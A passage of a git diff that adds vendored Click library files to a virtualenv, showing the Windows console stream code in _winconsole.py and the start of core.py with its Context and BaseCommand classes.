original patches as we do not need to patch +# the entire interpreter but just work in our little world of +# echo and prompt. +import io +import sys +import time +import typing as t +from ctypes import byref +from ctypes import c_char +from ctypes import c_char_p +from ctypes import c_int +from ctypes import c_ssize_t +from ctypes import c_ulong +from ctypes import c_void_p +from ctypes import POINTER +from ctypes import py_object +from ctypes import Structure +from ctypes.wintypes import DWORD +from ctypes.wintypes import HANDLE +from ctypes.wintypes import LPCWSTR +from ctypes.wintypes import LPWSTR + +from ._compat import _NonClosingTextIOWrapper + +assert sys.platform == "win32" +import msvcrt # noqa: E402 +from ctypes import windll # noqa: E402 +from ctypes import WINFUNCTYPE # noqa: E402 + +c_ssize_p = POINTER(c_ssize_t) + +kernel32 = windll.kernel32 +GetStdHandle = kernel32.GetStdHandle +ReadConsoleW = kernel32.ReadConsoleW +WriteConsoleW = kernel32.WriteConsoleW +GetConsoleMode = kernel32.GetConsoleMode +GetLastError = kernel32.GetLastError +GetCommandLineW = WINFUNCTYPE(LPWSTR)(("GetCommandLineW", windll.kernel32)) +CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))( + ("CommandLineToArgvW", windll.shell32) +) +LocalFree = WINFUNCTYPE(c_void_p, c_void_p)(("LocalFree", windll.kernel32)) + +STDIN_HANDLE = GetStdHandle(-10) +STDOUT_HANDLE = GetStdHandle(-11) +STDERR_HANDLE = GetStdHandle(-12) + +PyBUF_SIMPLE = 0 +PyBUF_WRITABLE = 1 + +ERROR_SUCCESS = 0 +ERROR_NOT_ENOUGH_MEMORY = 8 +ERROR_OPERATION_ABORTED = 995 + +STDIN_FILENO = 0 +STDOUT_FILENO = 1 +STDERR_FILENO = 2 + +EOF = b"\x1a" +MAX_BYTES_WRITTEN = 32767 + +try: + from ctypes import pythonapi +except ImportError: + # On PyPy we cannot get buffers so our ability to operate here is + # severely limited. + get_buffer = None +else: + + class Py_buffer(Structure): + _fields_ = [ + ("buf", c_void_p), + ("obj", py_object), + ("len", c_ssize_t), + ("itemsize", c_ssize_t), + ("readonly", c_int), + ("ndim", c_int), + ("format", c_char_p), + ("shape", c_ssize_p), + ("strides", c_ssize_p), + ("suboffsets", c_ssize_p), + ("internal", c_void_p), + ] + + PyObject_GetBuffer = pythonapi.PyObject_GetBuffer + PyBuffer_Release = pythonapi.PyBuffer_Release + + def get_buffer(obj, writable=False): + buf = Py_buffer() + flags = PyBUF_WRITABLE if writable else PyBUF_SIMPLE + PyObject_GetBuffer(py_object(obj), byref(buf), flags) + + try: + buffer_type = c_char * buf.len + return buffer_type.from_address(buf.buf) + finally: + PyBuffer_Release(byref(buf)) + + +class _WindowsConsoleRawIOBase(io.RawIOBase): + def __init__(self, handle): + self.handle = handle + + def isatty(self): + super().isatty() + return True + + +class _WindowsConsoleReader(_WindowsConsoleRawIOBase): + def readable(self): + return True + + def readinto(self, b): + bytes_to_be_read = len(b) + if not bytes_to_be_read: + return 0 + elif bytes_to_be_read % 2: + raise ValueError( + "cannot read odd number of bytes from UTF-16-LE encoded console" + ) + + buffer = get_buffer(b, writable=True) + code_units_to_be_read = bytes_to_be_read // 2 + code_units_read = c_ulong() + + rv = ReadConsoleW( + HANDLE(self.handle), + buffer, + code_units_to_be_read, + byref(code_units_read), + None, + ) + if GetLastError() == ERROR_OPERATION_ABORTED: + # wait for KeyboardInterrupt + time.sleep(0.1) + if not rv: + raise OSError(f"Windows error: {GetLastError()}") + + if buffer[0] == EOF: + return 0 + return 2 * code_units_read.value + + +class _WindowsConsoleWriter(_WindowsConsoleRawIOBase): + def writable(self): + return True + + @staticmethod + def _get_error_message(errno): + if errno == ERROR_SUCCESS: + return "ERROR_SUCCESS" + elif errno == ERROR_NOT_ENOUGH_MEMORY: + return "ERROR_NOT_ENOUGH_MEMORY" + return f"Windows error {errno}" + + def write(self, b): + bytes_to_be_written = len(b) + buf = get_buffer(b) + code_units_to_be_written = min(bytes_to_be_written, MAX_BYTES_WRITTEN) // 2 + code_units_written = c_ulong() + + WriteConsoleW( + HANDLE(self.handle), + buf, + code_units_to_be_written, + byref(code_units_written), + None, + ) + bytes_written = 2 * code_units_written.value + + if bytes_written == 0 and bytes_to_be_written > 0: + raise OSError(self._get_error_message(GetLastError())) + return bytes_written + + +class ConsoleStream: + def __init__(self, text_stream: t.TextIO, byte_stream: t.BinaryIO) -> None: + self._text_stream = text_stream + self.buffer = byte_stream + + @property + def name(self) -> str: + return self.buffer.name + + def write(self, x: t.AnyStr) -> int: + if isinstance(x, str): + return self._text_stream.write(x) + try: + self.flush() + except Exception: + pass + return self.buffer.write(x) + + def writelines(self, lines: t.Iterable[t.AnyStr]) -> None: + for line in lines: + self.write(line) + + def __getattr__(self, name: str) -> t.Any: + return getattr(self._text_stream, name) + + def isatty(self) -> bool: + return self.buffer.isatty() + + def __repr__(self): + return f"" + + +def _get_text_stdin(buffer_stream: t.BinaryIO) -> t.TextIO: + text_stream = _NonClosingTextIOWrapper( + io.BufferedReader(_WindowsConsoleReader(STDIN_HANDLE)), + "utf-16-le", + "strict", + line_buffering=True, + ) + return t.cast(t.TextIO, ConsoleStream(text_stream, buffer_stream)) + + +def _get_text_stdout(buffer_stream: t.BinaryIO) -> t.TextIO: + text_stream = _NonClosingTextIOWrapper( + io.BufferedWriter(_WindowsConsoleWriter(STDOUT_HANDLE)), + "utf-16-le", + "strict", + line_buffering=True, + ) + return t.cast(t.TextIO, ConsoleStream(text_stream, buffer_stream)) + + +def _get_text_stderr(buffer_stream: t.BinaryIO) -> t.TextIO: + text_stream = _NonClosingTextIOWrapper( + io.BufferedWriter(_WindowsConsoleWriter(STDERR_HANDLE)), + "utf-16-le", + "strict", + line_buffering=True, + ) + return t.cast(t.TextIO, ConsoleStream(text_stream, buffer_stream)) + + +_stream_factories: t.Mapping[int, t.Callable[[t.BinaryIO], t.TextIO]] = { + 0: _get_text_stdin, + 1: _get_text_stdout, + 2: _get_text_stderr, +} + + +def _is_console(f: t.TextIO) -> bool: + if not hasattr(f, "fileno"): + return False + + try: + fileno = f.fileno() + except (OSError, io.UnsupportedOperation): + return False + + handle = msvcrt.get_osfhandle(fileno) + return bool(GetConsoleMode(handle, byref(DWORD()))) + + +def _get_windows_console_stream( + f: t.TextIO, encoding: t.Optional[str], errors: t.Optional[str] +) -> t.Optional[t.TextIO]: + if ( + get_buffer is not None + and encoding in {"utf-16-le", None} + and errors in {"strict", None} + and _is_console(f) + ): + func = _stream_factories.get(f.fileno()) + if func is not None: + b = getattr(f, "buffer", None) + + if b is None: + return None + + return func(b) diff --git a/env/Lib/site-packages/click/core.py b/env/Lib/site-packages/click/core.py new file mode 100644 index 00000000..cc65e896 --- /dev/null +++ b/env/Lib/site-packages/click/core.py @@ -0,0 +1,3042 @@ +import enum +import errno +import inspect +import os +import sys +import typing as t +from collections import abc +from contextlib import contextmanager +from contextlib import ExitStack +from functools import update_wrapper +from gettext import gettext as _ +from gettext import ngettext +from itertools import repeat +from types import TracebackType + +from . import types +from .exceptions import Abort +from .exceptions import BadParameter +from .exceptions import ClickException +from .exceptions import Exit +from .exceptions import MissingParameter +from .exceptions import UsageError +from .formatting import HelpFormatter +from .formatting import join_options +from .globals import pop_context +from .globals import push_context +from .parser import _flag_needs_value +from .parser import OptionParser +from .parser import split_opt +from .termui import confirm +from .termui import prompt +from .termui import style +from .utils import _detect_program_name +from .utils import _expand_args +from .utils import echo +from .utils import make_default_short_help +from .utils import make_str +from .utils import PacifyFlushWrapper + +if t.TYPE_CHECKING: + import typing_extensions as te + from .shell_completion import CompletionItem + +F = t.TypeVar("F", bound=t.Callable[..., t.Any]) +V = t.TypeVar("V") + + +def _complete_visible_commands( + ctx: "Context", incomplete: str +) -> t.Iterator[t.Tuple[str, "Command"]]: + """List all the subcommands of a group that start with the + incomplete value and aren't hidden. + + :param ctx: Invocation context for the group. + :param incomplete: Value being completed. May be empty. + """ + multi = t.cast(MultiCommand, ctx.command) + + for name in multi.list_commands(ctx): + if name.startswith(incomplete): + command = multi.get_command(ctx, name) + + if command is not None and not command.hidden: + yield name, command + + +def _check_multicommand( + base_command: "MultiCommand", cmd_name: str, cmd: "Command", register: bool = False +) -> None: + if not base_command.chain or not isinstance(cmd, MultiCommand): + return + if register: + hint = ( + "It is not possible to add multi commands as children to" + " another multi command that is in chain mode." + ) + else: + hint = ( + "Found a multi command as subcommand to a multi command" + " that is in chain mode. This is not supported." + ) + raise RuntimeError( + f"{hint}. Command {base_command.name!r} is set to chain and" + f" {cmd_name!r} was added as a subcommand but it in itself is a" + f" multi command. ({cmd_name!r} is a {type(cmd).__name__}" + f" within a chained {type(base_command).__name__} named" + f" {base_command.name!r})." + ) + + +def batch(iterable: t.Iterable[V], batch_size: int) -> t.List[t.Tuple[V, ...]]: + return list(zip(*repeat(iter(iterable), batch_size))) + + +@contextmanager +def augment_usage_errors( + ctx: "Context", param: t.Optional["Parameter"] = None +) -> t.Iterator[None]: + """Context manager that attaches extra information to exceptions.""" + try: + yield + except BadParameter as e: + if e.ctx is None: + e.ctx = ctx + if param is not None and e.param is None: + e.param = param + raise + except UsageError as e: + if e.ctx is None: + e.ctx = ctx + raise + + +def iter_params_for_processing( + invocation_order: t.Sequence["Parameter"], + declaration_order: t.Sequence["Parameter"], +) -> t.List["Parameter"]: + """Given a sequence of parameters in the order as should be considered + for processing and an iterable of parameters that exist, this returns + a list in the correct order as they should be processed. + """ + + def sort_key(item: "Parameter") -> t.Tuple[bool, float]: + try: + idx: float = invocation_order.index(item) + except ValueError: + idx = float("inf") + + return not item.is_eager, idx + + return sorted(declaration_order, key=sort_key) + + +class ParameterSource(enum.Enum): + """This is an :class:`~enum.Enum` that indicates the source of a + parameter's value. + + Use :meth:`click.Context.get_parameter_source` to get the + source for a parameter by name. + + .. versionchanged:: 8.0 + Use :class:`~enum.Enum` and drop the ``validate`` method. + + .. versionchanged:: 8.0 + Added the ``PROMPT`` value. + """ + + COMMANDLINE = enum.auto() + """The value was provided by the command line args.""" + ENVIRONMENT = enum.auto() + """The value was provided with an environment variable.""" + DEFAULT = enum.auto() + """Used the default specified by the parameter.""" + DEFAULT_MAP = enum.auto() + """Used a default provided by :attr:`Context.default_map`.""" + PROMPT = enum.auto() + """Used a prompt to confirm a default or provide a value.""" + + +class Context: + """The context is a special internal object that holds state relevant + for the script execution at every single level. It's normally invisible + to commands unless they opt-in to getting access to it. + + The context is useful as it can pass internal objects around and can + control special execution features such as reading data from + environment variables. + + A context can be used as context manager in which case it will call + :meth:`close` on teardown. + + :param command: the command class for this context. + :param parent: the parent context. + :param info_name: the info name for this invocation. Generally this + is the most descriptive name for the script or + command. For the toplevel script it is usually + the name of the script, for commands below it it's + the name of the script. + :param obj: an arbitrary object of user data. + :param auto_envvar_prefix: the prefix to use for automatic environment + variables. If this is `None` then reading + from environment variables is disabled. This + does not affect manually set environment + variables which are always read. + :param default_map: a dictionary (like object) with default values + for parameters. + :param terminal_width: the width of the terminal. The default is + inherit from parent context. If no context + defines the terminal width then auto + detection will be applied. + :param max_content_width: the maximum width for content rendered by + Click (this currently only affects help + pages). This defaults to 80 characters if + not overridden. In other words: even if the + terminal is larger than that, Click will not + format things wider than 80 characters by + default. In addition to that, formatters might + add some safety mapping on the right. + :param resilient_parsing: if this flag is enabled then Click will + parse without any interactivity or callback + invocation. Default values will also be + ignored. This is useful for implementing + things such as completion support. + :param allow_extra_args: if this is set to `True` then extra arguments + at the end will not raise an error and will be + kept on the context. The default is to inherit + from the command. + :param allow_interspersed_args: if this is set to `False` then options + and arguments cannot be mixed. The + default is to inherit from the command. + :param ignore_unknown_options: instructs click to ignore options it does + not know and keeps them for later + processing. + :param help_option_names: optionally a list of strings that define how + the default help parameter is named. The + default is ``['--help']``. + :param token_normalize_func: an optional function that is used to + normalize tokens (options, choices, + etc.). This for instance can be used to + implement case insensitive behavior. + :param color: controls if the terminal supports ANSI colors or not. The + default is autodetection. This is only needed if ANSI + codes are used in texts that Click prints which is by + default not the case. This for instance would affect + help output. + :param show_default: Show the default value for commands. If this + value is not set, it defaults to the value from the parent + context. ``Command.show_default`` overrides this default for the + specific command. + + .. versionchanged:: 8.1 + The ``show_default`` parameter is overridden by + ``Command.show_default``, instead of the other way around. + + .. versionchanged:: 8.0 + The ``show_default`` parameter defaults to the value from the + parent context. + + .. versionchanged:: 7.1 + Added the ``show_default`` parameter. + + .. versionchanged:: 4.0 + Added the ``color``, ``ignore_unknown_options``, and + ``max_content_width`` parameters. + + .. versionchanged:: 3.0 + Added the ``allow_extra_args`` and ``allow_interspersed_args`` + parameters. + + .. versionchanged:: 2.0 + Added the ``resilient_parsing``, ``help_option_names``, and + ``token_normalize_func`` parameters. + """ + + #: The formatter class to create with :meth:`make_formatter`. + #: + #: .. versionadded:: 8.0 + formatter_class: t.Type["HelpFormatter"] = HelpFormatter + + def __init__( + self, + command: "Command", + parent: t.Optional["Context"] = None, + info_name: t.Optional[str] = None, + obj: t.Optional[t.Any] = None, + auto_envvar_prefix: t.Optional[str] = None, + default_map: t.Optional[t.MutableMapping[str, t.Any]] = None, + terminal_width: t.Optional[int] = None, + max_content_width: t.Optional[int] = None, + resilient_parsing: bool = False, + allow_extra_args: t.Optional[bool] = None, + allow_interspersed_args: t.Optional[bool] = None, + ignore_unknown_options: t.Optional[bool] = None, + help_option_names: t.Optional[t.List[str]] = None, + token_normalize_func: t.Optional[t.Callable[[str], str]] = None, + color: t.Optional[bool] = None, + show_default: t.Optional[bool] = None, + ) -> None: + #: the parent context or `None` if none exists. + self.parent = parent + #: the :class:`Command` for this context. + self.command = command + #: the descriptive information name + self.info_name = info_name + #: Map of parameter names to their parsed values. Parameters + #: with ``expose_value=False`` are not stored. + self.params: t.Dict[str, t.Any] = {} + #: the leftover arguments. + self.args: t.List[str] = [] + #: protected arguments. These are arguments that are prepended + #: to `args` when certain parsing scenarios are encountered but + #: must be never propagated to another arguments. This is used + #: to implement nested parsing. + self.protected_args: t.List[str] = [] + #: the collected prefixes of the command's options. + self._opt_prefixes: t.Set[str] = set(parent._opt_prefixes) if parent else set() + + if obj is None and parent is not None: + obj = parent.obj + + #: the user object stored. + self.obj: t.Any = obj + self._meta: t.Dict[str, t.Any] = getattr(parent, "meta", {}) + + #: A dictionary (-like object) with defaults for parameters. + if ( + default_map is None + and info_name is not None + and parent is not None + and parent.default_map is not None + ): + default_map = parent.default_map.get(info_name) + + self.default_map: t.Optional[t.MutableMapping[str, t.Any]] = default_map + + #: This flag indicates if a subcommand is going to be executed. A + #: group callback can use this information to figure out if it's + #: being executed directly or because the execution flow passes + #: onwards to a subcommand. By default it's None, but it can be + #: the name of the subcommand to execute. + #: + #: If chaining is enabled this will be set to ``'*'`` in case + #: any commands are executed. It is however not possible to + #: figure out which ones. If you require this knowledge you + #: should use a :func:`result_callback`. + self.invoked_subcommand: t.Optional[str] = None + + if terminal_width is None and parent is not None: + terminal_width = parent.terminal_width + + #: The width of the terminal (None is autodetection). + self.terminal_width: t.Optional[int] = terminal_width + + if max_content_width is None and parent is not None: + max_content_width = parent.max_content_width + + #: The maximum width of formatted content (None implies a sensible + #: default which is 80 for most things). + self.max_content_width: t.Optional[int] = max_content_width + + if allow_extra_args is None: + allow_extra_args = command.allow_extra_args + + #: Indicates if the context allows extra args or if it should + #: fail on parsing. + #: + #: .. versionadded:: 3.0 + self.allow_extra_args = allow_extra_args + + if allow_interspersed_args is None: + allow_interspersed_args = command.allow_interspersed_args + + #: Indicates if the context allows mixing of arguments and + #: options or not. + #: + #: .. versionadded:: 3.0 + self.allow_interspersed_args: bool = allow_interspersed_args + + if ignore_unknown_options is None: + ignore_unknown_options = command.ignore_unknown_options + + #: Instructs click to ignore options that a command does not + #: understand and will store it on the context for later + #: processing. This is primarily useful for situations where you + #: want to call into external programs. Generally this pattern is + #: strongly discouraged because it's not possibly to losslessly + #: forward all arguments. + #: + #: .. versionadded:: 4.0 + self.ignore_unknown_options: bool = ignore_unknown_options + + if help_option_names is None: + if parent is not None: + help_option_names = parent.help_option_names + else: + help_option_names = ["--help"] + + #: The names for the help options. + self.help_option_names: t.List[str] = help_option_names + + if token_normalize_func is None and parent is not None: + token_normalize_func = parent.token_normalize_func + + #: An optional normalization function for tokens. This is + #: options, choices, commands etc. + self.token_normalize_func: t.Optional[ + t.Callable[[str], str] + ] = token_normalize_func + + #: Indicates if resilient parsing is enabled. In that case Click + #: will do its best to not cause any failures and default values + #: will be ignored. Useful for completion. + self.resilient_parsing: bool = resilient_parsing + + # If there is no envvar prefix yet, but the parent has one and + # the command on this level has a name, we can expand the envvar + # prefix automatically. + if auto_envvar_prefix is None: + if ( + parent is not None + and parent.auto_envvar_prefix is not None + and self.info_name is not None + ): + auto_envvar_prefix = ( + f"{parent.auto_envvar_prefix}_{self.info_name.upper()}" + ) + else: + auto_envvar_prefix = auto_envvar_prefix.upper() + + if auto_envvar_prefix is not None: + auto_envvar_prefix = auto_envvar_prefix.replace("-", "_") + + self.auto_envvar_prefix: t.Optional[str] = auto_envvar_prefix + + if color is None and parent is not None: + color = parent.color + + #: Controls if styling output is wanted or not. + self.color: t.Optional[bool] = color + + if show_default is None and parent is not None: + show_default = parent.show_default + + #: Show option default values when formatting help text. + self.show_default: t.Optional[bool] = show_default + + self._close_callbacks: t.List[t.Callable[[], t.Any]] = [] + self._depth = 0 + self._parameter_source: t.Dict[str, ParameterSource] = {} + self._exit_stack = ExitStack() + + def to_info_dict(self) -> t.Dict[str, t.Any]: + """Gather information that could be useful for a tool generating + user-facing documentation. This traverses the entire CLI + structure. + + .. code-block:: python + + with Context(cli) as ctx: + info = ctx.to_info_dict() + + .. versionadded:: 8.0 + """ + return { + "command": self.command.to_info_dict(self), + "info_name": self.info_name, + "allow_extra_args": self.allow_extra_args, + "allow_interspersed_args": self.allow_interspersed_args, + "ignore_unknown_options": self.ignore_unknown_options, + "auto_envvar_prefix": self.auto_envvar_prefix, + } + + def __enter__(self) -> "Context": + self._depth += 1 + push_context(self) + return self + + def __exit__( + self, + exc_type: t.Optional[t.Type[BaseException]], + exc_value: t.Optional[BaseException], + tb: t.Optional[TracebackType], + ) -> None: + self._depth -= 1 + if self._depth == 0: + self.close() + pop_context() + + @contextmanager + def scope(self, cleanup: bool = True) -> t.Iterator["Context"]: + """This helper method can be used with the context object to promote + it to the current thread local (see :func:`get_current_context`). + The default behavior of this is to invoke the cleanup functions which + can be disabled by setting `cleanup` to `False`. The cleanup + functions are typically used for things such as closing file handles. + + If the cleanup is intended the context object can also be directly + used as a context manager. + + Example usage:: + + with ctx.scope(): + assert get_current_context() is ctx + + This is equivalent:: + + with ctx: + assert get_current_context() is ctx + + .. versionadded:: 5.0 + + :param cleanup: controls if the cleanup functions should be run or + not. The default is to run these functions. In + some situations the context only wants to be + temporarily pushed in which case this can be disabled. + Nested pushes automatically defer the cleanup. + """ + if not cleanup: + self._depth += 1 + try: + with self as rv: + yield rv + finally: + if not cleanup: + self._depth -= 1 + + @property + def meta(self) -> t.Dict[str, t.Any]: + """This is a dictionary which is shared with all the contexts + that are nested. It exists so that click utilities can store some + state here if they need to. It is however the responsibility of + that code to manage this dictionary well. + + The keys are supposed to be unique dotted strings. For instance + module paths are a good choice for it. What is stored in there is + irrelevant for the operation of click. However what is important is + that code that places data here adheres to the general semantics of + the system. + + Example usage:: + + LANG_KEY = f'{__name__}.lang' + + def set_language(value): + ctx = get_current_context() + ctx.meta[LANG_KEY] = value + + def get_language(): + return get_current_context().meta.get(LANG_KEY, 'en_US') + + .. versionadded:: 5.0 + """ + return self._meta + + def make_formatter(self) -> HelpFormatter: + """Creates the :class:`~click.HelpFormatter` for the help and + usage output. + + To quickly customize the formatter class used without overriding + this method, set the :attr:`formatter_class` attribute. + + .. versionchanged:: 8.0 + Added the :attr:`formatter_class` attribute. + """ + return self.formatter_class( + width=self.terminal_width, max_width=self.max_content_width + ) + + def with_resource(self, context_manager: t.ContextManager[V]) -> V: + """Register a resource as if it were used in a ``with`` + statement. The resource will be cleaned up when the context is + popped. + + Uses :meth:`contextlib.ExitStack.enter_context`. It calls the + resource's ``__enter__()`` method and returns the result. When + the context is popped, it closes the stack, which calls the + resource's ``__exit__()`` method. + + To register a cleanup function for something that isn't a + context manager, use :meth:`call_on_close`. Or use something + from :mod:`contextlib` to turn it into a context manager first. + + .. code-block:: python + + @click.group() + @click.option("--name") + @click.pass_context + def cli(ctx): + ctx.obj = ctx.with_resource(connect_db(name)) + + :param context_manager: The context manager to enter. + :return: Whatever ``context_manager.__enter__()`` returns. + + .. versionadded:: 8.0 + """ + return self._exit_stack.enter_context(context_manager) + + def call_on_close(self, f: t.Callable[..., t.Any]) -> t.Callable[..., t.Any]: + """Register a function to be called when the context tears down. + + This can be used to close resources opened during the script + execution. Resources that support Python's context manager + protocol which would be used in a ``with`` statement should be + registered with :meth:`with_resource` instead. + + :param f: The function to execute on teardown. + """ + return self._exit_stack.callback(f) + + def close(self) -> None: + """Invoke all close callbacks registered with + :meth:`call_on_close`, and exit all context managers entered + with :meth:`with_resource`. + """ + self._exit_stack.close() + # In case the context is reused, create a new exit stack. + self._exit_stack = ExitStack() + + @property + def command_path(self) -> str: + """The computed command path. This is used for the ``usage`` + information on the help page. It's automatically created by + combining the info names of the chain of contexts to the root. + """ + rv = "" + if self.info_name is not None: + rv = self.info_name + if self.parent is not None: + parent_command_path = [self.parent.command_path] + + if isinstance(self.parent.command, Command): + for param in self.parent.command.get_params(self): + parent_command_path.extend(param.get_usage_pieces(self)) + + rv = f"{' '.join(parent_command_path)} {rv}" + return rv.lstrip() + + def find_root(self) -> "Context": + """Finds the outermost context.""" + node = self + while node.parent is not None: + node = node.parent + return node + + def find_object(self, object_type: t.Type[V]) -> t.Optional[V]: + """Finds the closest object of a given type.""" + node: t.Optional["Context"] = self + + while node is not None: + if isinstance(node.obj, object_type): + return node.obj + + node = node.parent + + return None + + def ensure_object(self, object_type: t.Type[V]) -> V: + """Like :meth:`find_object` but sets the innermost object to a + new instance of `object_type` if it does not exist. + """ + rv = self.find_object(object_type) + if rv is None: + self.obj = rv = object_type() + return rv + + @t.overload + def lookup_default( + self, name: str, call: "te.Literal[True]" = True + ) -> t.Optional[t.Any]: + ... + + @t.overload + def lookup_default( + self, name: str, call: "te.Literal[False]" = ... + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + ... + + def lookup_default(self, name: str, call: bool = True) -> t.Optional[t.Any]: + """Get the default for a parameter from :attr:`default_map`. + + :param name: Name of the parameter. + :param call: If the default is a callable, call it. Disable to + return the callable instead. + + .. versionchanged:: 8.0 + Added the ``call`` parameter. + """ + if self.default_map is not None: + value = self.default_map.get(name) + + if call and callable(value): + return value() + + return value + + return None + + def fail(self, message: str) -> "te.NoReturn": + """Aborts the execution of the program with a specific error + message. + + :param message: the error message to fail with. + """ + raise UsageError(message, self) + + def abort(self) -> "te.NoReturn": + """Aborts the script.""" + raise Abort() + + def exit(self, code: int = 0) -> "te.NoReturn": + """Exits the application with a given exit code.""" + raise Exit(code) + + def get_usage(self) -> str: + """Helper method to get formatted usage string for the current + context and command. + """ + return self.command.get_usage(self) + + def get_help(self) -> str: + """Helper method to get formatted help page for the current + context and command. + """ + return self.command.get_help(self) + + def _make_sub_context(self, command: "Command") -> "Context": + """Create a new context of the same type as this context, but + for a new command. + + :meta private: + """ + return type(self)(command, info_name=command.name, parent=self) + + @t.overload + def invoke( + __self, # noqa: B902 + __callback: "t.Callable[..., V]", + *args: t.Any, + **kwargs: t.Any, + ) -> V: + ... + + @t.overload + def invoke( + __self, # noqa: B902 + __callback: "Command", + *args: t.Any, + **kwargs: t.Any, + ) -> t.Any: + ... + + def invoke( + __self, # noqa: B902 + __callback: t.Union["Command", "t.Callable[..., V]"], + *args: t.Any, + **kwargs: t.Any, + ) -> t.Union[t.Any, V]: + """Invokes a command callback in exactly the way it expects. There + are two ways to invoke this method: + + 1. the first argument can be a callback and all other arguments and + keyword arguments are forwarded directly to the function. + 2. the first argument is a click command object. In that case all + arguments are forwarded as well but proper click parameters + (options and click arguments) must be keyword arguments and Click + will fill in defaults. + + Note that before Click 3.2 keyword arguments were not properly filled + in against the intention of this code and no context was created. For + more information about this change and why it was done in a bugfix + release see :ref:`upgrade-to-3.2`. + + .. versionchanged:: 8.0 + All ``kwargs`` are tracked in :attr:`params` so they will be + passed if :meth:`forward` is called at multiple levels. + """ + if isinstance(__callback, Command): + other_cmd = __callback + + if other_cmd.callback is None: + raise TypeError( + "The given command does not have a callback that can be invoked." + ) + else: + __callback = t.cast("t.Callable[..., V]", other_cmd.callback) + + ctx = __self._make_sub_context(other_cmd) + + for param in other_cmd.params: + if param.name not in kwargs and param.expose_value: + kwargs[param.name] = param.type_cast_value( # type: ignore + ctx, param.get_default(ctx) + ) + + # Track all kwargs as params, so that forward() will pass + # them on in subsequent calls. + ctx.params.update(kwargs) + else: + ctx = __self + + with augment_usage_errors(__self): + with ctx: + return __callback(*args, **kwargs) + + def forward( + __self, __cmd: "Command", *args: t.Any, **kwargs: t.Any # noqa: B902 + ) -> t.Any: + """Similar to :meth:`invoke` but fills in default keyword + arguments from the current context if the other command expects + it. This cannot invoke callbacks directly, only other commands. + + .. versionchanged:: 8.0 + All ``kwargs`` are tracked in :attr:`params` so they will be + passed if ``forward`` is called at multiple levels. + """ + # Can only forward to other commands, not direct callbacks. + if not isinstance(__cmd, Command): + raise TypeError("Callback is not a command.") + + for param in __self.params: + if param not in kwargs: + kwargs[param] = __self.params[param] + + return __self.invoke(__cmd, *args, **kwargs) + + def set_parameter_source(self, name: str, source: ParameterSource) -> None: + """Set the source of a parameter. This indicates the location + from which the value of the parameter was obtained. + + :param name: The name of the parameter. + :param source: A member of :class:`~click.core.ParameterSource`. + """ + self._parameter_source[name] = source + + def get_parameter_source(self, name: str) -> t.Optional[ParameterSource]: + """Get the source of a parameter. This indicates the location + from which the value of the parameter was obtained. + + This can be useful for determining when a user specified a value + on the command line that is the same as the default value. It + will be :attr:`~click.core.ParameterSource.DEFAULT` only if the + value was actually taken from the default. + + :param name: The name of the parameter. + :rtype: ParameterSource + + .. versionchanged:: 8.0 + Returns ``None`` if the parameter was not provided from any + source. + """ + return self._parameter_source.get(name) + + +class BaseCommand: + """The base command implements the minimal API contract of commands. + Most code will never use this as it does not implement a lot of useful + functionality but it can act as the direct subclass of alternative + parsing methods that do not depend on the Click parser. + + For instance, this can be used to bridge Click and other systems like + argparse or docopt. + + Because base commands do not implement a lot of the API that other + parts of Click take for granted, they are not supported for all + operations. For instance, they cannot be used with the decorators + usually and they have no built-in callback system. + + .. versionchanged:: 2.0 + Added the `context_settings` parameter. + + :param name: the name of the command to use unless a group overrides it. + :param context_settings: an optional dictionary with defaults that are + passed to the context object. + """ + + #: The context class to create with :meth:`make_context`. + #: + #: .. versionadded:: 8.0 + context_class: t.Type[Context] = Context + #: the default for the :attr:`Context.allow_extra_args` flag. + allow_extra_args = False + #: the default for the :attr:`Context.allow_interspersed_args` flag. + allow_interspersed_args = True + #: the default for the :attr:`Context.ignore_unknown_options` flag. + ignore_unknown_options = False + + def __init__( + self, + name: t.Optional[str], + context_settings: t.Optional[t.MutableMapping[str, t.Any]] = None, + ) -> None: + #: the name the command thinks it has. Upon registering a command + #: on a :class:`Group` the group will default the command name + #: with this information. You should instead use the + #: :class:`Context`\'s :attr:`~Context.info_name` attribute. + self.name = name + + if context_settings is None: + context_settings = {} + + #: an optional dictionary with defaults passed to the context. + self.context_settings: t.MutableMapping[str, t.Any] = context_settings + + def to_info_dict(self, ctx: Context) -> t.Dict[str, t.Any]: + """Gather information that could be useful for a tool generating + user-facing documentation. This traverses the entire structure + below this command. + + Use :meth:`click.Context.to_info_dict` to traverse the entire + CLI structure. + + :param ctx: A :class:`Context` representing this command. + + .. versionadded:: 8.0 + """ + return {"name": self.name} + + def __repr__(self) -> str: + return f"<{self.__class__.__name__} {self.name}>" + + def get_usage(self, ctx: Context) -> str: + raise NotImplementedError("Base commands cannot get usage") + + def get_help(self, ctx: Context) -> str: + raise NotImplementedError("Base commands cannot get help") + + def make_context( + self, + info_name: t.Optional[str], + args: t.List[str], + parent: t.Optional[Context] = None, + **extra: t.Any, + ) -> Context: + """This function when given an info name and arguments will kick + off the parsing and create a new :class:`Context`. It does not + invoke the actual command callback though. + + To quickly customize the context class used without overriding + this method, set the :attr:`context_class` attribute. + + :param info_name: the info name for this invocation. Generally this + is the most descriptive name for the script or + command. For the toplevel script it's usually + the name of the script, for commands below it's + the name of the command. + :param args: the arguments to parse as list of strings. + :param parent: the parent context if available. + :param extra: extra keyword arguments forwarded to the context + constructor. + + .. versionchanged:: 8.0 + Added the :attr:`context_class` attribute. + """ + for key, value in self.context_settings.items(): + if key not in extra: + extra[key] = value + + ctx = self.context_class( + self, info_name=info_name, parent=parent, **extra # type: ignore + ) + + with ctx.scope(cleanup=False): + self.parse_args(ctx, args) + return ctx + + def parse_args(self, ctx: Context, args: t.List[str]) -> t.List[str]: + """Given a context and a list of arguments this creates the parser + and parses the arguments, then modifies the context as necessary. + This is automatically invoked by :meth:`make_context`. + """ + raise NotImplementedError("Base commands do not know how to parse arguments.") + + def invoke(self, ctx: Context) -> t.Any: + """Given a context, this invokes the command. The default + implementation is raising a not implemented error. + """ + raise NotImplementedError("Base commands are not invocable by default") + + def shell_complete(self, ctx: Context, incomplete: str) -> t.List["CompletionItem"]: + """Return a list of completions for the incomplete value. Looks + at the names of chained multi-commands. + + Any command could be part of a chained multi-command, so sibling + commands are valid at any point during command completion. Other + command classes will return more completions. + + :param ctx: Invocation context for this command. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + results: t.List["CompletionItem"] = [] + + while ctx.parent is not None: + ctx = ctx.parent 